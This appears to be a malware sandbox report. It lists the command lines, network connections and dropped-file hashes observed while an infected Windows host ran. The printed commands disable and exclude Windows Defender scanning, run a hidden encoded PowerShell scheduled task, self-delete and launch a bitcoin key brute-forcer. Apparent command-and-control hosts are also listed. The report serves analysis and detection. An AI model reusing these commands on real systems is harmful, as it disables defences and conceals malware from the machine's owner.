C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService start GameServerClientC

C:\Program Files (x86)\GameServerClient\GameService.exe

"C:\Program Files (x86)\GameServerClient\GameService.exe"

C:\Program Files (x86)\GameServerClient\GameServerClientC.exe

"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\Temp\35748.exe

"C:\Windows\Temp\35748.exe" --coin BTC -m ADDRESSES -t 0 --range 28df28bec40000000:28df28bec80000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Users\Admin\Pictures\SUjb9Up84Rw8tmFImFpNS5X8.exe

"C:\Users\Admin\Pictures\SUjb9Up84Rw8tmFImFpNS5X8.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1916 -ip 1916

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 936

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1916 -ip 1916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 948

C:\Users\Admin\Pictures\O1c4ldHHgJFVg5LLZai7o8Hy.exe

"C:\Users\Admin\Pictures\O1c4ldHHgJFVg5LLZai7o8Hy.exe"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32

C:\Users\Admin\Pictures\RSM6CiUtofKuWBEZT3YoJA2v.exe

"C:\Users\Admin\Pictures\RSM6CiUtofKuWBEZT3YoJA2v.exe"

C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe

"C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gtNABvddg" /SC once /ST 06:49:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gtNABvddg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Network

Country Destination Domain Proto
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 134.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 206.221.208.4.in-addr.arpa udp
BE 2.17.196.184:443 www.bing.com tcp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 184.196.17.2.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 149.191.110.104.in-addr.arpa udp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 167.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 affordcharmcropwo.shop udp
US 172.67.181.34:443 affordcharmcropwo.shop tcp
US 8.8.8.8:53 cleartotalfisherwo.shop udp
US 104.21.72.132:443 cleartotalfisherwo.shop tcp
US 8.8.8.8:53 34.181.67.172.in-addr.arpa udp
US 8.8.8.8:53 132.72.21.104.in-addr.arpa udp
US 8.8.8.8:53 worryfillvolcawoi.shop udp
US 172.67.199.191:443 worryfillvolcawoi.shop tcp
US 8.8.8.8:53 enthusiasimtitleow.shop udp
US 172.67.183.226:443 enthusiasimtitleow.shop tcp
US 8.8.8.8:53 191.199.67.172.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 dismissalcylinderhostw.shop udp
US 104.21.22.160:443 dismissalcylinderhostw.shop tcp
US 8.8.8.8:53 226.183.67.172.in-addr.arpa udp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 productivelookewr.shop udp
US 172.67.150.207:443 productivelookewr.shop tcp
US 8.8.8.8:53 diskretainvigorousiw.shop udp
DE 185.172.128.33:8970 tcp
US 104.21.23.143:443 diskretainvigorousiw.shop tcp
US 8.8.8.8:53 tolerateilusidjukl.shop udp
US 8.8.8.8:53 160.22.21.104.in-addr.arpa udp
US 8.8.8.8:53 207.150.67.172.in-addr.arpa udp
US 8.8.8.8:53 33.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 143.23.21.104.in-addr.arpa udp
US 104.21.89.202:443 tolerateilusidjukl.shop tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 communicationgenerwo.shop udp
RU 193.233.132.234:80 193.233.132.234 tcp
US 104.21.83.19:443 communicationgenerwo.shop tcp
US 8.8.8.8:53 shatterbreathepsw.shop udp
US 172.67.169.43:443 shatterbreathepsw.shop tcp
US 8.8.8.8:53 pillowbrocccolipe.shop udp
US 104.21.47.56:443 pillowbrocccolipe.shop tcp
US 8.8.8.8:53 shortsvelventysjo.shop udp
US 8.8.8.8:53 202.89.21.104.in-addr.arpa udp
US 8.8.8.8:53 19.83.21.104.in-addr.arpa udp
US 8.8.8.8:53 234.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 43.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 56.47.21.104.in-addr.arpa udp
US 104.21.16.225:443 shortsvelventysjo.shop tcp
US 8.8.8.8:53 incredibleextedwj.shop udp
US 104.21.86.106:443 incredibleextedwj.shop tcp
RU 185.215.113.67:26260 tcp
US 8.8.8.8:53 225.16.21.104.in-addr.arpa udp
US 8.8.8.8:53 alcojoldwograpciw.shop udp
US 172.67.157.23:443 alcojoldwograpciw.shop tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 liabilitynighstjsko.shop udp
US 8.8.8.8:53 106.86.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 23.157.67.172.in-addr.arpa udp
US 104.21.44.3:443 liabilitynighstjsko.shop tcp
US 8.8.8.8:53 demonstationfukewko.shop udp
US 172.67.147.169:443 demonstationfukewko.shop tcp
US 8.8.8.8:53 3.44.21.104.in-addr.arpa udp
FR 52.143.157.84:80 52.143.157.84 tcp
RU 193.233.132.167:80 193.233.132.167 tcp
RU 77.221.151.47:80 77.221.151.47 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 169.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 84.157.143.52.in-addr.arpa udp
US 8.8.8.8:53 47.151.221.77.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.175:80 193.233.132.175 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 skategirls.org udp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 realdeepai.org udp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.90.14:443 realdeepai.org tcp
US 8.8.8.8:53 net.geo.opera.com udp
NL 185.26.182.112:80 net.geo.opera.com tcp
US 8.8.8.8:53 jonathantwo.com udp
US 104.21.31.124:443 jonathantwo.com tcp
US 104.21.31.124:443 jonathantwo.com tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 175.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 14.90.21.104.in-addr.arpa udp
US 8.8.8.8:53 yip.su udp
US 172.67.169.89:443 yip.su tcp
RU 5.42.65.67:48396 tcp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 124.31.21.104.in-addr.arpa udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 67.65.42.5.in-addr.arpa udp
US 172.67.169.89:443 yip.su tcp
US 172.67.19.24:443 pastebin.com tcp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 www.google.com udp
RU 193.233.132.175:80 193.233.132.175 tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 iplogger.com udp
US 8.8.8.8:53 10.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 172.67.188.178:443 iplogger.com tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.31.124:443 jonathantwo.com tcp
US 8.8.8.8:53 skategirls.org udp
US 104.21.31.124:443 jonathantwo.com tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
NL 185.26.182.112:443 net.geo.opera.com tcp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 178.188.67.172.in-addr.arpa udp
US 8.8.8.8:53 105.242.123.52.in-addr.arpa udp
RU 5.42.66.10:80 5.42.66.10 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 10.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 59.8.26.104.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
RU 193.233.132.167:80 193.233.132.167 tcp
RU 5.42.66.10:80 5.42.66.10 tcp
US 104.26.8.59:443 api.myip.com tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 note.padd.cn.com udp
US 8.8.8.8:53 20.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 106.76.97.176.in-addr.arpa udp
US 8.8.8.8:53 download.opera.com udp
US 8.8.8.8:53 features.opera-api2.com udp
NL 82.145.216.15:443 features.opera-api2.com tcp
NL 185.26.182.117:443 download.opera.com tcp
US 8.8.8.8:53 15.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 117.182.26.185.in-addr.arpa udp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
US 8.8.8.8:53 download5.operacdn.com udp
US 104.18.11.89:443 download5.operacdn.com tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.76:80 185.172.128.76 tcp
US 8.8.8.8:53 89.11.18.104.in-addr.arpa udp
US 8.8.8.8:53 76.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
DE 185.172.128.76:80 185.172.128.76 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.51:443 download.iolo.net tcp
US 8.8.8.8:53 51.56.244.143.in-addr.arpa udp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
RU 91.215.85.66:15647 tcp
US 8.8.8.8:53 66.85.215.91.in-addr.arpa udp
RU 91.215.85.66:9000 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 145.155.9.20.in-addr.arpa udp

Files

memory/2892-0-0x00000000007F0000-0x0000000000CB2000-memory.dmp

memory/2892-1-0x0000000077144000-0x0000000077146000-memory.dmp

memory/2892-2-0x00000000007F0000-0x0000000000CB2000-memory.dmp

memory/2892-3-0x00000000051C0000-0x00000000051C1000-memory.dmp

memory/2892-8-0x00000000051A0000-0x00000000051A1000-memory.dmp

memory/2892-7-0x00000000051B0000-0x00000000051B1000-memory.dmp

memory/2892-6-0x0000000005190000-0x0000000005191000-memory.dmp

memory/2892-5-0x00000000051F0000-0x00000000051F1000-memory.dmp

memory/2892-4-0x00000000051D0000-0x00000000051D1000-memory.dmp

memory/2892-9-0x0000000005210000-0x0000000005211000-memory.dmp

memory/2892-14-0x00000000007F0000-0x0000000000CB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

MD5 8facf6d258ba6125d842d5e0d5469bfb
SHA1 4374fc7f57ea001165cdcf36bbc6f6015203ef05
SHA256 217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854
SHA512 41c9e23c7b29c8901bd7fcf3932f44144116faa5505c33e0572d4c2b6ef687ddda8b77559cc4187007abcdb74620d1740c3075b9601c39a700a17f792555de8f

memory/2452-17-0x00000000009A0000-0x0000000000E62000-memory.dmp

memory/2452-18-0x00000000009A0000-0x0000000000E62000-memory.dmp

memory/2452-20-0x0000000005380000-0x0000000005381000-memory.dmp

memory/2452-19-0x0000000005370000-0x0000000005371000-memory.dmp

memory/2452-21-0x0000000005360000-0x0000000005361000-memory.dmp

memory/2452-22-0x00000000053A0000-0x00000000053A1000-memory.dmp

memory/2452-23-0x0000000005340000-0x0000000005341000-memory.dmp

memory/2452-24-0x0000000005350000-0x0000000005351000-memory.dmp

memory/2452-25-0x00000000053C0000-0x00000000053C1000-memory.dmp

memory/2452-26-0x00000000053B0000-0x00000000053B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe

MD5 1c7d0f34bb1d85b5d2c01367cc8f62ef
SHA1 33aedadb5361f1646cffd68791d72ba5f1424114
SHA256 e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c
SHA512 53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

memory/4660-46-0x0000000000980000-0x00000000009D2000-memory.dmp

memory/4660-47-0x0000000072D50000-0x0000000073500000-memory.dmp

memory/4008-50-0x0000000000400000-0x000000000044C000-memory.dmp

memory/4008-53-0x0000000000400000-0x000000000044C000-memory.dmp

memory/4660-54-0x0000000002D60000-0x0000000004D60000-memory.dmp

memory/4008-55-0x0000000000900000-0x0000000000901000-memory.dmp

memory/4008-56-0x0000000000900000-0x0000000000901000-memory.dmp

memory/4008-57-0x0000000000900000-0x0000000000901000-memory.dmp

memory/4008-58-0x0000000000900000-0x0000000000901000-memory.dmp

memory/4008-59-0x0000000000400000-0x000000000044C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

MD5 31841361be1f3dc6c2ce7756b490bf0f
SHA1 ff2506641a401ac999f5870769f50b7326f7e4eb
SHA256 222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee
SHA512 53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

memory/4660-73-0x0000000072D50000-0x0000000073500000-memory.dmp

memory/2212-78-0x00000000009B0000-0x0000000000C68000-memory.dmp

memory/4640-77-0x0000000000400000-0x0000000000592000-memory.dmp

